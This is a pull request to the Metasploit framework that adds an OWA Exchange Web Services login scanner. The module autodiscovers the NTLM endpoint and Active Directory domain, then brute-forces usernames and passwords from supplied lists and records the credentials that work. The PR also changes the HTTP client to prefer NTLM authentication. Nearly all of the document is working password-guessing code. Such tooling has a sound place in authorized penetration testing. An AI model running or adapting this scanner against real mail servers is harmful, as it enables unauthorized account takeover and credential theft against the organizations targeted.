### PR TITLE
owa_ews_login module

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -246,3 +246,6 @@ DEPENDENCIES
   simplecov
   timecop
   yard
+
+BUNDLED WITH
+   1.11.2

--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -246,6 +246,3 @@ DEPENDENCIES
   simplecov
   timecop
   yard
-
-BUNDLED WITH
-   1.11.2

--- a/lib/rex/proto/http/client.rb
+++ b/lib/rex/proto/http/client.rb
@@ -271,26 +271,30 @@ class Client
 
     return res if opts['username'].nil? or opts['username'] == ''
     supported_auths = res.headers['WWW-Authenticate']
-    if supported_auths.include? 'Basic'
+
+    # if several providers are available, the client may want one in particular
+    preferred_auth = opts['preferred_auth']
+
+    if supported_auths.include? 'Basic' and (preferred_auth.nil? or preferred_auth == 'Basic')
       opts['headers'] ||= {}
       opts['headers']['Authorization'] = basic_auth_header(opts['username'],opts['password'] )
       req = request_cgi(opts)
       res = _send_recv(req,t,persist)
       return res
-    elsif  supported_auths.include? "Digest"
+    elsif supported_auths.include? "Digest" and (preferred_auth.nil? or preferred_auth == 'Digest')
       temp_response = digest_auth(opts)
       if temp_response.kind_of? Rex::Proto::Http::Response
         res = temp_response
       end
       return res
-    elsif supported_auths.include? "NTLM"
+    elsif supported_auths.include? "NTLM" and (preferred_auth.nil? or preferred_auth == 'NTLM')
       opts['provider'] = 'NTLM'
       temp_response = negotiate_auth(opts)
       if temp_response.kind_of? Rex::Proto::Http::Response
         res = temp_response
       end
       return res
-    elsif supported_auths.include? "Negotiate"
+    elsif supported_auths.include? "Negotiate" and (preferred_auth.nil? or preferred_auth == 'Negotiate')
       opts['provider'] = 'Negotiate'
       temp_response = negotiate_auth(opts)
       if temp_response.kind_of? Rex::Proto::Http::Response

--- a/lib/rex/proto/http/client.rb
+++ b/lib/rex/proto/http/client.rb
@@ -275,26 +275,26 @@ class Client
     # if several providers are available, the client may want one in particular
     preferred_auth = opts['preferred_auth']
 
-    if supported_auths.include? 'Basic' and (preferred_auth.nil? or preferred_auth == 'Basic')
+    if supported_auths.include?('Basic') && (preferred_auth.nil? || preferred_auth == 'Basic')
       opts['headers'] ||= {}
       opts['headers']['Authorization'] = basic_auth_header(opts['username'],opts['password'] )
       req = request_cgi(opts)
       res = _send_recv(req,t,persist)
       return res
-    elsif supported_auths.include? "Digest" and (preferred_auth.nil? or preferred_auth == 'Digest')
+    elsif supported_auths.include?('Digest') && (preferred_auth.nil? || preferred_auth == 'Digest')
       temp_response = digest_auth(opts)
       if temp_response.kind_of? Rex::Proto::Http::Response
         res = temp_response
       end
       return res
-    elsif supported_auths.include? "NTLM" and (preferred_auth.nil? or preferred_auth == 'NTLM')
+    elsif supported_auths.include?('NTLM') && (preferred_auth.nil? || preferred_auth == 'NTLM')
       opts['provider'] = 'NTLM'
       temp_response = negotiate_auth(opts)
       if temp_response.kind_of? Rex::Proto::Http::Response
         res = temp_response
       end
       return res
-    elsif supported_auths.include? "Negotiate" and (preferred_auth.nil? or preferred_auth == 'Negotiate')
+    elsif supported_auths.include?('Negotiate') && (preferred_auth.nil? || preferred_auth == 'Negotiate')
       opts['provider'] = 'Negotiate'
       temp_response = negotiate_auth(opts)
       if temp_response.kind_of? Rex::Proto::Http::Response

--- a/modules/auxiliary/scanner/http/owa_ews_login.rb
+++ b/modules/auxiliary/scanner/http/owa_ews_login.rb
@@ -8,7 +8,7 @@ require 'rex/proto/ntlm/message'
 require 'rex/proto/http'
 require 'metasploit/framework/credential_collection'
 
-class Metasploit3 < Msf::Auxiliary
+class Metasploit < Msf::Auxiliary
 
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::AuthBrute

--- a/modules/auxiliary/scanner/http/owa_ews_login.rb
+++ b/modules/auxiliary/scanner/http/owa_ews_login.rb
@@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
         OptBool.new('AUTODISCOVER', [ false, "Automatically discover domain URI", true ]),
         OptString.new('AD_DOMAIN', [ false, "The Active Directory domain name", nil ]),
         OptString.new('TARGETURI', [ false, "The location of the NTLM service", nil ]),
-        OptInt.new('RPORT', [ true, "The target port", 443 ])
+        Opt::RPORT(443)
       ], self.class)
   end
 

--- a/modules/auxiliary/scanner/http/owa_ews_login.rb
+++ b/modules/auxiliary/scanner/http/owa_ews_login.rb
@@ -8,7 +8,7 @@ require 'rex/proto/ntlm/message'
 require 'rex/proto/http'
 require 'metasploit/framework/credential_collection'
 
-class Metasploit < Msf::Auxiliary
+class MetasploitModule < Msf::Auxiliary
 
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::AuthBrute

--- a/modules/auxiliary/scanner/http/owa_ews_login.rb
+++ b/modules/auxiliary/scanner/http/owa_ews_login.rb
@@ -19,8 +19,12 @@ class Metasploit3 < Msf::Auxiliary
       'Name'           => 'OWA Exchange Web Services (EWS) Login Scanner',
       'Description'    => %q{
         This module attempts to log in to the Exchange Web Services, often
-        exposed at https://owahost/ews/, using NTLM authentication. This method
-        is faster and simpler than traditional form-based logins.
+        exposed at https://example.com/ews/, using NTLM authentication. This
+        method is faster and simpler than traditional form-based logins.
+
+        In most cases, all you need to set is RHOSTS and some combination of
+        user/pass files; the autodiscovery should find the location of the NTLM
+        authentication point as well as the AD domain, and use them accordingly.
       },
       'Author'         => 'Rich Whitcroft',
       'License'        => MSF_LICENSE,
@@ -85,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary
         res = cli.send_recv(req)
       rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
         print_error("Connection failed")
-        return
+        next
       end
 
       if res.code != 401

--- a/modules/auxiliary/scanner/http/owa_ews_login.rb
+++ b/modules/auxiliary/scanner/http/owa_ews_login.rb
@@ -1,0 +1,165 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/proto/ntlm/message'
+require 'rex/proto/http'
+require 'metasploit/framework/credential_collection'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::AuthBrute
+  include Msf::Auxiliary::Scanner
+
+  def initialize
+    super(
+      'Name'           => 'OWA Exchange Web Services (EWS) Login Scanner',
+      'Description'    => %q{
+        This module attempts to log in to the Exchange Web Services, often
+        exposed at https://owahost/ews/, using NTLM authentication. This method
+        is faster and simpler than traditional form-based logins.
+      },
+      'Author'         => 'Rich Whitcroft',
+      'License'        => MSF_LICENSE,
+      'DefaultOptions' => { 'SSL' => true, 'VERBOSE' => false }
+    )
+
+    register_options(
+      [
+        OptBool.new('AUTODISCOVER', [ false, "Automatically discover domain URI", true ]),
+        OptString.new('AD_DOMAIN', [ false, "The Active Directory domain name", nil ]),
+        OptString.new('TARGET_URI', [ false, "The location of the NTLM service", nil ]),
+        OptInt.new('RPORT', [ true, "The target port", 443 ]),
+      ], self.class)
+  end
+
+  def run_host(ip)
+    cli = Rex::Proto::Http::Client.new(datastore['RHOSTS'], datastore['RPORT'], {}, datastore['SSL'], datastore['SSLVersion'], nil, '', '')
+    cli.set_config({ 'preferred_auth' => 'NTLM' })
+    cli.connect
+
+    domain = nil
+    uri = nil
+
+    if datastore['AUTODISCOVER']
+      domain, uri = autodiscover(cli)
+      if domain and uri
+        print_good("Found NTLM service at #{uri} for domain #{domain}.")
+      else
+        print_error("Failed to autodiscover - try manually")
+        return
+      end
+    elsif datastore['AD_DOMAIN'] and datastore['TARGET_URI']
+      domain = datastore['AD_DOMAIN']
+      uri = datastore['TARGET_URI']
+      uri << "/" unless uri.chars.last == "/"
+    else
+      print_error("You must set AD_DOMAIN and TARGET_URI if not using autodiscover.")
+      return
+    end
+
+    cli.set_config({ 'domain' => domain })
+
+    creds = Metasploit::Framework::CredentialCollection.new(
+      blank_passwords: datastore['BLANK_PASSWORDS'],
+      pass_file: datastore['PASS_FILE'],
+      password: datastore['PASSWORD'],
+      user_file: datastore['USER_FILE'],
+      userpass_file: datastore['USERPASS_FILE'],
+      username: datastore['USERNAME'],
+      user_as_pass: datastore['USER_AS_PASS']
+    )
+
+    creds.each do |cred|
+      begin
+        req = cli.request_raw({
+          'uri' => uri,
+          'method' => 'GET',
+          'username' => cred.public,
+          'password' => cred.private
+        })
+
+        resp = cli.send_recv(req)
+      rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
+        print_error("Connection failed")
+        return
+      end
+
+      if resp.code != 401
+        print_brute :level => :good, :ip => ip, :msg => "Successful login: #{cred.to_s}"
+        report_cred(
+          ip: ip,
+          port: datastore['RPORT'],
+          service_name: 'owa_ews',
+          user: cred.public,
+          password: cred.private
+        )
+
+        return if datastore['STOP_ON_SUCCESS']
+      else
+        vprint_brute :level => :verror, :ip => ip, :msg => "Failed login: #{cred.to_s}"
+      end
+    end
+  end
+
+  def autodiscover(cli)
+    uris = %w[ /ews/ /rpc/ /public/ ]
+    uris.each do |u|
+      begin
+        req = cli.request_raw({
+          'encode'   => true,
+          'uri'      => u,
+          'method'   => 'GET',
+          'headers'  =>  {'Authorization' => 'NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw=='}
+        })
+
+        res = cli.send_recv(req)
+      rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
+        print_error("HTTP Connection Failed")
+        next
+      end
+
+      if not res
+        print_error("HTTP Connection Timeout")
+        next
+      end
+
+      if res && res.code == 401 && res.headers.has_key?('WWW-Authenticate') && res.headers['WWW-Authenticate'].match(/^NTLM/i)
+        hash = res['WWW-Authenticate'].split('NTLM ')[1]
+        domain = Rex::Proto::NTLM::Message.parse(Rex::Text.decode_base64(hash))[:target_name].value().gsub(/\0/,'')
+        return domain, u
+      end
+    end
+
+    return nil, nil
+  end
+
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      last_attempted_at: DateTime.now,
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+end

--- a/modules/auxiliary/scanner/http/owa_ews_login.rb
+++ b/modules/auxiliary/scanner/http/owa_ews_login.rb
@@ -82,13 +82,13 @@ class Metasploit3 < Msf::Auxiliary
           'password' => cred.private
         })
 
-        resp = cli.send_recv(req)
+        res = cli.send_recv(req)
       rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
         print_error("Connection failed")
         return
       end
 
-      if resp.code != 401
+      if res.code != 401
         print_brute :level => :good, :ip => ip, :msg => "Successful login: #{cred.to_s}"
         report_cred(
           ip: ip,


### PR DESCRIPTION
This module is for password guessing against OWA's EWS service which often exposes NTLM authentication over HTTPS. It is typically faster than the traditional form-based OWA login method.

The Rex HTTP client was modified slightly to allow for a preferred authentication method (NTLM in this case). Without this, if a service offers Basic and NTLM simultaneously, the NTLM auth will never be reached because Basic is checked first.
